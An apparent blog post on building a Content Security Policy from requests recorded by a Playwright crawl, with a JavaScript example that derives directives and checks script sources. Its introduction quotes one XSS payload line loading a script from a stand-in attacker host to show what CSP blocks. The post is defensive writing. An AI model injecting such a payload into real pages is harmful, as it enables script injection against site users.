Generating a CSP using a playwright script

Implementing Content Security Policies, The Easy Way.

What’s a CSP?

A good Content Security Policy (CSP) is one of the mitigating defenses against XSS and clickjacking attacks. While not a panacea, it can effectively limit the severity of any exploit by constraining the XSS payload size to the injection window, which is typically limited to a few characters. Instead of externally loading a payload like: <script src="https://evil.com/payload.js"/> the entire payload must be encoded in the script evaluation window, effectively preventing nasty frameworks like BeEF from being loaded....

// Kevin Pham · May 4, 2021
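
An added example, not code from the original post: it turns a recorded list of page requests into a policy and checks that the external payload URL quoted above would be refused. It assumes the list was captured with Playwright's `page.on('request', ...)` using `request.resourceType()` and `request.url()`; the `*.example` hosts, the function names and the `default-src 'none'` baseline are assumptions made for illustration.

```javascript
// Constructed sample of what a crawl of the site would record (made-up hosts).
const observed = [
  { type: 'document',   url: 'https://app.example/' },
  { type: 'script',     url: 'https://app.example/static/app.js' },
  { type: 'script',     url: 'https://cdn.example/lib/vendor.min.js' },
  { type: 'stylesheet', url: 'https://app.example/static/site.css' },
  { type: 'image',      url: 'https://img.example/logo.png' },
  { type: 'font',       url: 'https://cdn.example/fonts/a.woff2' },
  { type: 'xhr',        url: 'https://api.example/v1/me' },
  { type: 'fetch',      url: 'https://api.example/v1/items' },
];

// Playwright resource type -> CSP fetch directive.
const DIRECTIVE = {
  script: 'script-src', stylesheet: 'style-src', image: 'img-src',
  font: 'font-src', media: 'media-src', xhr: 'connect-src',
  fetch: 'connect-src', websocket: 'connect-src', eventsource: 'connect-src',
};

// Build a policy that allows only the origins actually observed.
function buildPolicy(requests, pageOrigin) {
  const sources = new Map(); // directive -> Set of source expressions
  for (const { type, url } of requests) {
    const directive = DIRECTIVE[type];
    if (!directive) continue; // e.g. the top-level document
    const origin = new URL(url).origin;
    if (!sources.has(directive)) sources.set(directive, new Set());
    sources.get(directive).add(origin === pageOrigin ? "'self'" : origin);
  }
  // Assumption: deny everything that was not seen during the crawl.
  const parts = ["default-src 'none'"];
  for (const [name, set] of [...sources].sort(([a], [b]) => (a < b ? -1 : 1))) {
    parts.push(`${name} ${[...set].sort().join(' ')}`);
  }
  return parts.join('; ');
}

// Simplified, origin-only version of CSP source matching for script-src.
function allowsScript(policy, scriptUrl, pageOrigin) {
  const tokens = policy.split(';').map((d) => d.trim().split(/\s+/));
  const directive = tokens.find((t) => t[0] === 'script-src');
  if (!directive) return false; // falls back to default-src 'none'
  const origin = new URL(scriptUrl).origin;
  return directive.slice(1).some((src) =>
    src === "'self'" ? origin === pageOrigin : src === origin);
}
```

A policy generated this way only covers what the crawl exercised, so it is best deployed first as `Content-Security-Policy-Report-Only` and tightened from the violation reports.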